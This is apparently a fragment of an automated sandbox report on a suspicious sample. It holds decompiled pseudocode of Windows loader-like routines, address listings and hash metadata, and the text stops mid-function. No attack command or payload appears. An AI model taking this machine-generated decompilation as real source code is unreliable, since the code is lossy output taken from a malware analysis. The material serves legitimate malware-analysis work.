                                                                                                            														_t165 = _t353 + 0x54; // 0x54
                                                                                                            														_t252 = _t165;
                                                                                                            														__eflags =  *(_t342 + 4) - _t252;
                                                                                                            														if( *(_t342 + 4) != _t252) {
                                                                                                            															L135:
                                                                                                            															asm("int 0x29");
                                                                                                            															L136:
                                                                                                            															_t288 = _v200;
                                                                                                            															_t366 = 0xc0000138;
                                                                                                            															L54:
                                                                                                            															_t342 = _t288;
                                                                                                            															L010A3898(0, _t288, _t366);
                                                                                                            														} else {
                                                                                                            															_t324 =  *(_t252 + 4);
                                                                                                            															__eflags =  *_t324 - _t252;
                                                                                                            															if( *_t324 != _t252) {
                                                                                                            																goto L135;
                                                                                                            															} else {
                                                                                                            																 *_t324 = _t342;
                                                                                                            																 *(_t342 + 4) = _t324;
                                                                                                            																_t293 =  *(_t353 + 0x50);
                                                                                                            																_v180 =  *_t293;
                                                                                                            																E0107FFB0(_t293, _t353, 0x11584d8);
                                                                                                            																__eflags =  *((short*)(_t353 + 0x3a));
                                                                                                            																if( *((short*)(_t353 + 0x3a)) != 0) {
                                                                                                            																	_t342 = 0;
                                                                                                            																	__eflags = 0;
                                                                                                            																	E010A37F5(_t353, 0);
                                                                                                            																}
                                                                                                            																E010A0413(_t353);
                                                                                                            																_t256 =  *(_t353 + 0x48);
                                                                                                            																__eflags = _t256;
                                                                                                            																if(_t256 != 0) {
                                                                                                            																	__eflags = _t256 - 0xffffffff;
                                                                                                            																	if(_t256 != 0xffffffff) {
                                                                                                            																		E01099B10(_t256);
                                                                                                            																	}
                                                                                                            																}
                                                                                                            																__eflags =  *(_t353 + 0x28);
                                                                                                            																if( *(_t353 + 0x28) != 0) {
                                                                                                            																	_t174 = _t353 + 0x24; // 0x24
                                                                                                            																	E010902D6(_t174);
                                                                                                            																}
                                                                                                            																L010877F0( *0x1157b98, 0, _t353);
                                                                                                            																__eflags = _v180 - _t293;
                                                                                                            																if(__eflags == 0) {
                                                                                                            																	E0109C277(_t293, _t366);
                                                                                                            																}
                                                                                                            																_t288 = _v164;
                                                                                                            																goto L40;
                                                                                                            															}
                                                                                                            														}
                                                                                                            													} else {
                                                                                                            														goto L40;
                                                                                                            													}
                                                                                                            												}
                                                                                                            											}
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										L0107EC7F(_t353);
                                                                                                            										L010919B8(_t287, 0, _t353, 0);
                                                                                                            										_t200 = E0106F4E3(__eflags);
                                                                                                            										continue;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								L41:
                                                                                                            								if(_v157 != 0) {
                                                                                                            									L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                                                                                            								}
                                                                                                            								if(_t366 < 0 || ( *0x115b2f8 |  *0x115b2fc) == 0 || ( *0x115b2e4 & 0x00000001) != 0) {
                                                                                                            									L46:
                                                                                                            									 *_v212 = _v168;
                                                                                                            									_t204 = _t366;
                                                                                                            									L47:
                                                                                                            									_pop(_t354);
                                                                                                            									_pop(_t367);
                                                                                                            									_pop(_t289);
                                                                                                            									return E010AB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                                                                                            								} else {
                                                                                                            									_v200 = 0;
                                                                                                            									if(( *0x115b2ec >> 0x00000008 & 0x00000003) == 3) {
                                                                                                            										_t355 = _v168;
                                                                                                            										_t342 =  &_v208;
                                                                                                            										_t208 = E01116B68(_v168,  &_v208, _v168, __eflags);
                                                                                                            										__eflags = _t208 - 1;
                                                                                                            										if(_t208 == 1) {
                                                                                                            											goto L46;
                                                                                                            										} else {
                                                                                                            											__eflags = _v208 & 0x00000010;
                                                                                                            											if((_v208 & 0x00000010) == 0) {
                                                                                                            												goto L46;
                                                                                                            											} else {
                                                                                                            												_t342 = 4;
                                                                                                            												_t366 = E01116AEB(_t355, 4,  &_v216);
                                                                                                            												__eflags = _t366;
                                                                                                            												if(_t366 >= 0) {
                                                                                                            													goto L46;
                                                                                                            												} else {
                                                                                                            													asm("int 0x29");
                                                                                                            													_t356 = 0;
                                                                                                            													_v44 = 0;
                                                                                                            													_t290 = _v52;
                                                                                                            													__eflags = 0;
                                                                                                            													if(0 == 0) {
                                                                                                            														L108:
                                                                                                            														_t356 = 0;
                                                                                                            														_v44 = 0;
                                                                                                            														goto L63;
                                                                                                            													} else {
                                                                                                            														__eflags = 0;
                                                                                                            														if(0 < 0) {
                                                                                                            															goto L108;
                                                                                                            														}
                                                                                                            														L63:
                                                                                                            														_v112 = _t356;
                                                                                                            														__eflags = _t356;
                                                                                                            														if(_t356 == 0) {
                                                                                                            															L143:
                                                                                                            															_v8 = 0xfffffffe;
                                                                                                            															_t211 = 0xc0000089;
                                                                                                            														} else {
                                                                                                            															_v36 = 0;
                                                                                                            															_v60 = 0;
                                                                                                            															_v48 = 0;
                                                                                                            															_v68 = 0;
                                                                                                            															_v44 = _t290 & 0xfffffffc;
                                                                                                            															E0107E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                                                                                            															_t306 = _v68;
                                                                                                            															__eflags = _t306;
                                                                                                            															if(_t306 == 0) {
                                                                                                            																_t216 = 0xc000007b;
                                                                                                            																_v36 = 0xc000007b;
                                                                                                            																_t307 = _v60;
                                                                                                            															} else {
                                                                                                            																__eflags = _t290 & 0x00000001;
                                                                                                            																if(__eflags == 0) {
                                                                                                            																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                                                                                            																	__eflags = _t349 - 0x10b;
                                                                                                            																	if(_t349 != 0x10b) {
                                                                                                            																		__eflags = _t349 - 0x20b;
                                                                                                            																		if(_t349 == 0x20b) {
                                                                                                            																			goto L102;
                                                                                                            																		} else {
                                                                                                            																			_t307 = 0;
                                                                                                            																			_v48 = 0;
                                                                                                            																			_t216 = 0xc000007b;
                                                                                                            																			_v36 = 0xc000007b;
                                                                                                            																			goto L71;
                                                                                                            																		}
                                                                                                            																	} else {
                                                                                                            																		L102:
                                                                                                            																		_t307 =  *(_t306 + 0x50);
                                                                                                            																		goto L69;
                                                                                                            																	}
                                                                                                            																	goto L151;
                                                                                                            																} else {
                                                                                                            																	_t239 = L0107EAEA(_t290, _t290, _t356, _t366, __eflags);
                                                                                                            																	_t307 = _t239;
                                                                                                            																	_v60 = _t307;
                                                                                                            																	_v48 = _t307;
                                                                                                            																	__eflags = _t307;
                                                                                                            																	if(_t307 != 0) {
                                                                                                            																		L70:
                                                                                                            																		_t216 = _v36;
                                                                                                            																	} else {
                                                                                                            																		_push(_t239);
                                                                                                            																		_push(0x14);
                                                                                                            																		_push( &_v144);
                                                                                                            																		_push(3);
                                                                                                            																		_push(_v44);
                                                                                                            																		_push(0xffffffff);
                                                                                                            																		_t319 = E010A9730();
                                                                                                            																		_v36 = _t319;
                                                                                                            																		__eflags = _t319;
                                                                                                            																		if(_t319 < 0) {
                                                                                                            																			_t216 = 0xc000001f;
                                                                                                            																			_v36 = 0xc000001f;
                                                                                                            																			_t307 = _v60;
                                                                                                            																		} else {
                                                                                                            																			_t307 = _v132;
                                                                                                            																			L69:
                                                                                                            																			_v48 = _t307;
                                                                                                            																			goto L70;
                                                                                                            																		}
                                                                                                            																	}
                                                                                                            																}
                                                                                                            															}
                                                                                                            															L71:
                                                                                                            															_v72 = _t307;
                                                                                                            															_v84 = _t216;
                                                                                                            															__eflags = _t216 - 0xc000007b;
                                                                                                            															if(_t216 == 0xc000007b) {
                                                                                                            																L150:
                                                                                                            																_v8 = 0xfffffffe;
                                                                                                            																_t211 = 0xc000007b;
                                                                                                            															} else {
                                                                                                            																_t344 = _t290 & 0xfffffffc;
                                                                                                            																_v76 = _t344;
                                                                                                            																__eflags = _v40 - _t344;
                                                                                                            																if(_v40 <= _t344) {
                                                                                                            																	goto L150;
                                                                                                            																} else {
                                                                                                            																	__eflags = _t307;
                                                                                                            																	if(_t307 == 0) {
                                                                                                            																		L75:
                                                                                                            																		_t217 = 0;
                                                                                                            																		_v104 = 0;
                                                                                                            																		__eflags = _t366;
                                                                                                            																		if(_t366 != 0) {
                                                                                                            																			__eflags = _t290 & 0x00000001;
                                                                                                            																			if((_t290 & 0x00000001) != 0) {
                                                                                                            																				_t217 = 1;
                                                                                                            																				_v104 = 1;
                                                                                                            																			}
                                                                                                            																			_t290 = _v44;
                                                                                                            																			_v52 = _t290;
                                                                                                            																		}
                                                                                                            																		__eflags = _t217 - 1;
                                                                                                            																		if(_t217 != 1) {
                                                                                                            																			_t369 = 0;
                                                                                                            																			_t218 = _v40;
                                                                                                            																			goto L91;
                                                                                                            																		} else {
                                                                                                            																			_v64 = 0;
                                                                                                            																			E0107E9C0(1, _t290, 0, 0,  &_v64);
                                                                                                            																			_t309 = _v64;
                                                                                                            																			_v108 = _t309;
                                                                                                            																			__eflags = _t309;
                                                                                                            																			if(_t309 == 0) {
                                                                                                            																				goto L143;
                                                                                                            																			} else {
                                                                                                            																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                                                                                            																				__eflags = _t226 - 0x10b;
                                                                                                            																				if(_t226 != 0x10b) {
                                                                                                            																					__eflags = _t226 - 0x20b;
                                                                                                            																					if(_t226 != 0x20b) {
                                                                                                            																						goto L143;
                                                                                                            																					} else {
                                                                                                            																						_t371 =  *(_t309 + 0x98);
                                                                                                            																						goto L83;
                                                                                                            																					}
                                                                                                            																				} else {
                                                                                                            																					_t371 =  *(_t309 + 0x88);
                                                                                                            																					L83:
                                                                                                            																					__eflags = _t371;
                                                                                                            																					if(_t371 != 0) {
                                                                                                            																						_v80 = _t371 - _t356 + _t290;
                                                                                                            																						_t310 = _v64;
                                                                                                            																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                                                                                            																						_t292 =  *(_t310 + 6) & 0x0000ffff;
                                                                                                            																						_t311 = 0;
                                                                                                            																						__eflags = 0;
                                                                                                            																						while(1) {
                                                                                                            																							_v120 = _t311;
                                                                                                            																							_v116 = _t348;
                                                                                                            																							__eflags = _t311 - _t292;
                                                                                                            																							if(_t311 >= _t292) {
                                                                                                            																								goto L143;
                                                                                                            																							}
                                                                                                            																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                                                                                            																							__eflags = _t371 - _t359;
                                                                                                            																							if(_t371 < _t359) {
                                                                                                            																								L98:
                                                                                                            																								_t348 = _t348 + 0x28;
                                                                                                            																								_t311 = _t311 + 1;
                                                                                                            																								continue;
                                                                                                            																							} else {
                                                                                                            																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                                                                                            																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                                                                                            																									goto L98;
                                                                                                            																								} else {
                                                                                                            																									__eflags = _t348;
                                                                                                            																									if(_t348 == 0) {
                                                                                                            																										goto L143;
                                                                                                            																									} else {
                                                                                                            																										_t218 = _v40;
                                                                                                            																										_t312 =  *_t218;
                                                                                                            																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                                                                                            																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                                                                                            																											_v100 = _t359;
                                                                                                            																											_t360 = _v108;
                                                                                                            																											_t372 = L01078F44(_v108, _t312);
                                                                                                            																											__eflags = _t372;
                                                                                                            																											if(_t372 == 0) {
                                                                                                            																												goto L143;
                                                                                                            																											} else {
                                                                                                            																												_t290 = _v52;
                                                                                                            																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E010A3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                                                                                            																												_t307 = _v72;
                                                                                                            																												_t344 = _v76;
                                                                                                            																												_t218 = _v40;
                                                                                                            																												goto L91;
                                                                                                            																											}
                                                                                                            																										} else {
                                                                                                            																											_t290 = _v52;
                                                                                                            																											_t307 = _v72;
                                                                                                            																											_t344 = _v76;
                                                                                                            																											_t369 = _v80;
                                                                                                            																											L91:
                                                                                                            																											_t358 = _a4;
                                                                                                            																											__eflags = _t358;
                                                                                                            																											if(_t358 == 0) {
                                                                                                            																												L95:
                                                                                                            																												_t308 = _a8;
                                                                                                            																												__eflags = _t308;
                                                                                                            																												if(_t308 != 0) {
                                                                                                            																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                                                                                            																												}
                                                                                                            																												_v8 = 0xfffffffe;
                                                                                                            																												_t211 = _v84;
                                                                                                            																											} else {
                                                                                                            																												_t370 =  *_t218 - _t369 + _t290;
                                                                                                            																												 *_t358 = _t370;
                                                                                                            																												__eflags = _t370 - _t344;
                                                                                                            																												if(_t370 <= _t344) {
                                                                                                            																													L149:
                                                                                                            																													 *_t358 = 0;
                                                                                                            																													goto L150;
                                                                                                            																												} else {
                                                                                                            																													__eflags = _t307;
                                                                                                            																													if(_t307 == 0) {
                                                                                                            																														goto L95;
                                                                                                            																													} else {
                                                                                                            																														__eflags = _t370 - _t344 + _t307;
                                                                                                            																														if(_t370 >= _t344 + _t307) {
                                                                                                            																															goto L149;
                                                                                                            																														} else {
                                                                                                            																															goto L95;
                                                                                                            																														}
                                                                                                            																													}
                                                                                                            																												}
                                                                                                            																											}
                                                                                                            																										}
                                                                                                            																									}
                                                                                                            																								}
                                                                                                            																							}
                                                                                                            																							goto L97;
                                                                                                            																						}
                                                                                                            																					}
                                                                                                            																					goto L143;
                                                                                                            																				}
                                                                                                            																			}
                                                                                                            																		}
                                                                                                            																	} else {
                                                                                                            																		__eflags = _v40 - _t307 + _t344;
                                                                                                            																		if(_v40 >= _t307 + _t344) {
                                                                                                            																			goto L150;
                                                                                                            																		} else {
                                                                                                            																			goto L75;
                                                                                                            																		}
                                                                                                            																	}
                                                                                                            																}
                                                                                                            															}
                                                                                                            														}
                                                                                                            														L97:
                                                                                                            														 *[fs:0x0] = _v20;
                                                                                                            														return _t211;
                                                                                                            													}
                                                                                                            												}
                                                                                                            											}
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										goto L46;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								goto L151;
                                                                                                            							}
                                                                                                            							_t288 = _v164;
                                                                                                            							_t366 = 0xc0000135;
                                                                                                            							goto L41;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				L151:
                                                                                                            			}
                                                                                                            0x0107d716
                                                                                                            0x0107d71b
                                                                                                            0x0107d720
                                                                                                            0x0107d726
                                                                                                            0x0107d726
                                                                                                            0x0107d72d
                                                                                                            0x00000000
                                                                                                            0x0107d733
                                                                                                            0x0107d739
                                                                                                            0x0107d742
                                                                                                            0x0107d750
                                                                                                            0x0107d758
                                                                                                            0x0107d764
                                                                                                            0x0107d776
                                                                                                            0x0107d77a
                                                                                                            0x0107d783
                                                                                                            0x0107d928
                                                                                                            0x0107d92c
                                                                                                            0x0107d93d
                                                                                                            0x0107d944
                                                                                                            0x0107d94f
                                                                                                            0x0107d954
                                                                                                            0x0107d956
                                                                                                            0x0107d95f
                                                                                                            0x0107d961
                                                                                                            0x0107d973
                                                                                                            0x0107d973
                                                                                                            0x0107d956
                                                                                                            0x0107d944
                                                                                                            0x0107d92c
                                                                                                            0x0107d78b
                                                                                                            0x010cb394
                                                                                                            0x0107d791
                                                                                                            0x0107d798
                                                                                                            0x010cb3a3
                                                                                                            0x010cb3bb
                                                                                                            0x010cb3bb
                                                                                                            0x0107d7a5
                                                                                                            0x0107d866
                                                                                                            0x0107d870
                                                                                                            0x0107d892
                                                                                                            0x0107d898
                                                                                                            0x0107d89e
                                                                                                            0x0107d8a0
                                                                                                            0x0107d8a6
                                                                                                            0x0107d8ac
                                                                                                            0x0107d8ae
                                                                                                            0x0107d8b4
                                                                                                            0x0107d8b4
                                                                                                            0x0107d8ae
                                                                                                            0x0107d7a5
                                                                                                            0x0107d78b
                                                                                                            0x0107d7b1
                                                                                                            0x010cb3c5
                                                                                                            0x010cb3c5
                                                                                                            0x0107d7c3
                                                                                                            0x0107d7ca
                                                                                                            0x0107d7e5
                                                                                                            0x0107d7eb
                                                                                                            0x0107d8eb
                                                                                                            0x0107d8ed
                                                                                                            0x00000000
                                                                                                            0x0107d8f3
                                                                                                            0x0107d8f3
                                                                                                            0x0107d8f3
                                                                                                            0x00000000
                                                                                                            0x0107d8ed
                                                                                                            0x0107d7cc
                                                                                                            0x0107d7cc
                                                                                                            0x0107d7d2
                                                                                                            0x00000000
                                                                                                            0x0107d7d4
                                                                                                            0x0107d7d4
                                                                                                            0x0107d7d7
                                                                                                            0x0107d7df
                                                                                                            0x010cb3d4
                                                                                                            0x010cb3d9
                                                                                                            0x010cb3dc
                                                                                                            0x010cb3dc
                                                                                                            0x010cb3df
                                                                                                            0x010cb3e2
                                                                                                            0x010cb468
                                                                                                            0x010cb46d
                                                                                                            0x010cb46f
                                                                                                            0x010cb46f
                                                                                                            0x010cb475
                                                                                                            0x0107d8f8
                                                                                                            0x0107d8f9
                                                                                                            0x0107d8fd
                                                                                                            0x010cb3e8
                                                                                                            0x010cb3e8
                                                                                                            0x010cb3eb
                                                                                                            0x010cb3ed
                                                                                                            0x00000000
                                                                                                            0x010cb3ef
                                                                                                            0x010cb3ef
                                                                                                            0x010cb3f1
                                                                                                            0x010cb3f4
                                                                                                            0x010cb3fe
                                                                                                            0x010cb404
                                                                                                            0x010cb409
                                                                                                            0x010cb40e
                                                                                                            0x010cb410
                                                                                                            0x010cb410
                                                                                                            0x010cb414
                                                                                                            0x010cb414
                                                                                                            0x010cb41b
                                                                                                            0x010cb420
                                                                                                            0x010cb423
                                                                                                            0x010cb425
                                                                                                            0x010cb427
                                                                                                            0x010cb42a
                                                                                                            0x010cb42d
                                                                                                            0x010cb42d
                                                                                                            0x010cb42a
                                                                                                            0x010cb432
                                                                                                            0x010cb436
                                                                                                            0x010cb438
                                                                                                            0x010cb43b
                                                                                                            0x010cb43b
                                                                                                            0x010cb449
                                                                                                            0x010cb44e
                                                                                                            0x010cb454
                                                                                                            0x010cb458
                                                                                                            0x010cb458
                                                                                                            0x010cb45d
                                                                                                            0x00000000
                                                                                                            0x010cb45d
                                                                                                            0x010cb3ed
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0107d7df
                                                                                                            0x0107d7d2
                                                                                                            0x0107d7ca
                                                                                                            0x010cb37c
                                                                                                            0x010cb37e
                                                                                                            0x010cb385
                                                                                                            0x010cb38a
                                                                                                            0x00000000
                                                                                                            0x010cb38a
                                                                                                            0x0107d742
                                                                                                            0x0107d7f1
                                                                                                            0x0107d7f8
                                                                                                            0x010cb49b
                                                                                                            0x010cb49b
                                                                                                            0x0107d800
                                                                                                            0x0107d837
                                                                                                            0x0107d843
                                                                                                            0x0107d845
                                                                                                            0x0107d847
                                                                                                            0x0107d84a
                                                                                                            0x0107d84b
                                                                                                            0x0107d84e
                                                                                                            0x0107d857
                                                                                                            0x0107d818
                                                                                                            0x0107d824
                                                                                                            0x0107d831
                                                                                                            0x010cb4a5
                                                                                                            0x010cb4ab
                                                                                                            0x010cb4b3
                                                                                                            0x010cb4b8
                                                                                                            0x010cb4bb
                                                                                                            0x00000000
                                                                                                            0x010cb4c1
                                                                                                            0x010cb4c1
                                                                                                            0x010cb4c8
                                                                                                            0x00000000
                                                                                                            0x010cb4ce
                                                                                                            0x010cb4d4
                                                                                                            0x010cb4e1
                                                                                                            0x010cb4e3
                                                                                                            0x010cb4e5
                                                                                                            0x00000000
                                                                                                            0x010cb4eb
                                                                                                            0x010cb4f0
                                                                                                            0x010cb4f2
                                                                                                            0x0107dac9
                                                                                                            0x0107dacc
                                                                                                            0x0107dacf
                                                                                                            0x0107dad1
                                                                                                            0x0107dd78
                                                                                                            0x0107dd78
                                                                                                            0x0107dcf2
                                                                                                            0x00000000
                                                                                                            0x0107dad7
                                                                                                            0x0107dad9
                                                                                                            0x0107dadb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0107dae1
                                                                                                            0x0107dae1
                                                                                                            0x0107dae4
                                                                                                            0x0107dae6
                                                                                                            0x010cb4f9
                                                                                                            0x010cb4f9
                                                                                                            0x010cb500
                                                                                                            0x0107daec
                                                                                                            0x0107daec
                                                                                                            0x0107daf5
                                                                                                            0x0107daf8
                                                                                                            0x0107dafb
                                                                                                            0x0107db03
                                                                                                            0x0107db11
                                                                                                            0x0107db16
                                                                                                            0x0107db19
                                                                                                            0x0107db1b
                                                                                                            0x010cb52c
                                                                                                            0x010cb531
                                                                                                            0x010cb534
                                                                                                            0x0107db21
                                                                                                            0x0107db21
                                                                                                            0x0107db24
                                                                                                            0x0107dcd9
                                                                                                            0x0107dce2
                                                                                                            0x0107dce5
                                                                                                            0x0107dd6a
                                                                                                            0x0107dd6d
                                                                                                            0x00000000
                                                                                                            0x0107dd73
                                                                                                            0x010cb51a
                                                                                                            0x010cb51c
                                                                                                            0x010cb51f
                                                                                                            0x010cb524
                                                                                                            0x00000000
                                                                                                            0x010cb524
                                                                                                            0x0107dce7
                                                                                                            0x0107dce7
                                                                                                            0x0107dce7
                                                                                                            0x00000000
                                                                                                            0x0107dce7
                                                                                                            0x00000000
                                                                                                            0x0107db2a
                                                                                                            0x0107db2c
                                                                                                            0x0107db31

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 267c2504cd26594277672c64d8bee49b3a223b66d36cd8a9eb40b0aa0ddd8d01
                                                                                                            • Instruction ID: 70105d80e9db662b430589e796736787d993e5c18475334b86c7caf249c52ccb
                                                                                                            • Opcode Fuzzy Hash: 267c2504cd26594277672c64d8bee49b3a223b66d36cd8a9eb40b0aa0ddd8d01
                                                                                                            • Instruction Fuzzy Hash: 54E1DF30E0435ACFEB659F68C880BADBBF2BF45704F0441E9D9899B291DB30A981CF55
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 92%
                                                                                                            			E0107849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                                                                                            				void* _t136;
                                                                                                            				signed int _t139;
                                                                                                            				signed int _t141;
                                                                                                            				signed int _t145;
                                                                                                            				intOrPtr _t146;
                                                                                                            				signed int _t149;
                                                                                                            				signed int _t150;
                                                                                                            				signed int _t161;
                                                                                                            				signed int _t163;
                                                                                                            				signed int _t165;
                                                                                                            				signed int _t169;
                                                                                                            				signed int _t171;
                                                                                                            				signed int _t194;
                                                                                                            				signed int _t200;
                                                                                                            				void* _t201;
                                                                                                            				signed int _t204;
                                                                                                            				signed int _t206;
                                                                                                            				signed int _t210;
                                                                                                            				signed int _t214;
                                                                                                            				signed int _t215;
                                                                                                            				signed int _t218;
                                                                                                            				void* _t221;
                                                                                                            				signed int _t224;
                                                                                                            				signed int _t226;
                                                                                                            				intOrPtr _t228;
                                                                                                            				signed int _t232;
                                                                                                            				signed int _t233;
                                                                                                            				signed int _t234;
                                                                                                            				void* _t237;
                                                                                                            				void* _t238;
                                                                                                            
                                                                                                            				_t236 = __esi;
                                                                                                            				_t235 = __edi;
                                                                                                            				_t193 = __ebx;
                                                                                                            				_push(0x70);
                                                                                                            				_push(0x113f9c0);
                                                                                                            				E010BD0E8(__ebx, __edi, __esi);
                                                                                                            				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                                                                                            				if( *0x1157b04 == 0) {
                                                                                                            					L4:
                                                                                                            					goto L5;
                                                                                                            				} else {
                                                                                                            					_t136 = E0107CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                                                                                            					_t236 = 0;
                                                                                                            					if(_t136 < 0) {
                                                                                                            						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                                                                                            					}
                                                                                                            					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                                                                                            						_t193 =  *( *[fs:0x30] + 0x18);
                                                                                                            						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                                                                                            						 *(_t237 - 0x68) = _t236;
                                                                                                            						 *(_t237 - 0x6c) = _t236;
                                                                                                            						_t235 = _t236;
                                                                                                            						 *(_t237 - 0x60) = _t236;
                                                                                                            						E01082280( *[fs:0x30], 0x1158550);
                                                                                                            						_t139 =  *0x1157b04; // 0x1
                                                                                                            						__eflags = _t139 - 1;
                                                                                                            						if(__eflags != 0) {
                                                                                                            							_t200 = 0xc;
                                                                                                            							_t201 = _t237 - 0x40;
                                                                                                            							_t141 = E0109F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                                                                                            							 *(_t237 - 0x44) = _t141;
                                                                                                            							__eflags = _t141;
                                                                                                            							if(_t141 < 0) {
                                                                                                            								L50:
                                                                                                            								E0107FFB0(_t193, _t235, 0x1158550);
                                                                                                            								L5:
                                                                                                            								return E010BD130(_t193, _t235, _t236);
                                                                                                            							}
                                                                                                            							_push(_t201);
                                                                                                            							_t221 = 0x10;
                                                                                                            							_t202 =  *(_t237 - 0x40);
                                                                                                            							_t145 = E01061C45( *(_t237 - 0x40), _t221);
                                                                                                            							 *(_t237 - 0x44) = _t145;
                                                                                                            							__eflags = _t145;
                                                                                                            							if(_t145 < 0) {
                                                                                                            								goto L50;
                                                                                                            							}
                                                                                                            							_t146 =  *0x1157b9c; // 0x0
                                                                                                            							_t235 = L01084620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                                                                                            							 *(_t237 - 0x60) = _t235;
                                                                                                            							__eflags = _t235;
                                                                                                            							if(_t235 == 0) {
                                                                                                            								_t149 = 0xc0000017;
                                                                                                            								 *(_t237 - 0x44) = 0xc0000017;
                                                                                                            							} else {
                                                                                                            								_t149 =  *(_t237 - 0x44);
                                                                                                            							}
                                                                                                            							__eflags = _t149;
                                                                                                            							if(__eflags >= 0) {
                                                                                                            								L8:
                                                                                                            								 *(_t237 - 0x64) = _t235;
                                                                                                            								_t150 =  *0x1157b10; // 0x0
                                                                                                            								 *(_t237 - 0x4c) = _t150;
                                                                                                            								_push(_t237 - 0x74);
                                                                                                            								_push(_t237 - 0x39);
                                                                                                            								_push(_t237 - 0x58);
                                                                                                            								_t193 = E0109A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                                                                                            								 *(_t237 - 0x44) = _t193;
                                                                                                            								__eflags = _t193;
                                                                                                            								if(_t193 < 0) {
                                                                                                            									L30:
                                                                                                            									E0107FFB0(_t193, _t235, 0x1158550);
                                                                                                            									__eflags = _t235 - _t237 - 0x38;
                                                                                                            									if(_t235 != _t237 - 0x38) {
                                                                                                            										_t235 =  *(_t237 - 0x48);
                                                                                                            										L010877F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                                                                                            									} else {
                                                                                                            										_t235 =  *(_t237 - 0x48);
                                                                                                            									}
                                                                                                            									__eflags =  *(_t237 - 0x6c);
                                                                                                            									if( *(_t237 - 0x6c) != 0) {
                                                                                                            										L010877F0(_t235, _t236,  *(_t237 - 0x6c));
                                                                                                            									}
                                                                                                            									__eflags = _t193;
                                                                                                            									if(_t193 >= 0) {
                                                                                                            										goto L4;
                                                                                                            									} else {
                                                                                                            										goto L5;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								_t204 =  *0x1157b04; // 0x1
                                                                                                            								 *(_t235 + 8) = _t204;
                                                                                                            								__eflags =  *((char*)(_t237 - 0x39));
                                                                                                            								if( *((char*)(_t237 - 0x39)) != 0) {
                                                                                                            									 *(_t235 + 4) = 1;
                                                                                                            									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                                                                                            									_t161 =  *0x1157b10; // 0x0
                                                                                                            									 *(_t237 - 0x4c) = _t161;
                                                                                                            								} else {
                                                                                                            									 *(_t235 + 4) = _t236;
                                                                                                            									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                                                                                            								}
                                                                                                            								 *((intOrPtr*)(_t237 - 0x54)) = E010A37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                                                                                            								_t224 = _t236;
                                                                                                            								 *(_t237 - 0x40) = _t236;
                                                                                                            								 *(_t237 - 0x50) = _t236;
                                                                                                            								while(1) {
                                                                                                            									_t163 =  *(_t235 + 8);
                                                                                                            									__eflags = _t224 - _t163;
                                                                                                            									if(_t224 >= _t163) {
                                                                                                            										break;
                                                                                                            									}
                                                                                                            									_t228 =  *0x1157b9c; // 0x0
                                                                                                            									_t214 = L01084620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                                                                                            									 *(_t237 - 0x78) = _t214;
                                                                                                            									__eflags = _t214;
                                                                                                            									if(_t214 == 0) {
                                                                                                            										L52:
                                                                                                            										_t193 = 0xc0000017;
                                                                                                            										L19:
                                                                                                            										 *(_t237 - 0x44) = _t193;
                                                                                                            										L20:
                                                                                                            										_t206 =  *(_t237 - 0x40);
                                                                                                            										__eflags = _t206;
                                                                                                            										if(_t206 == 0) {
                                                                                                            											L26:
                                                                                                            											__eflags = _t193;
                                                                                                            											if(_t193 < 0) {
                                                                                                            												E010A37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                                                                                            												__eflags =  *((char*)(_t237 - 0x39));
                                                                                                            												if( *((char*)(_t237 - 0x39)) != 0) {
                                                                                                            													 *0x1157b10 =  *0x1157b10 - 8;
                                                                                                            												}
                                                                                                            											} else {
                                                                                                            												_t169 =  *(_t237 - 0x68);
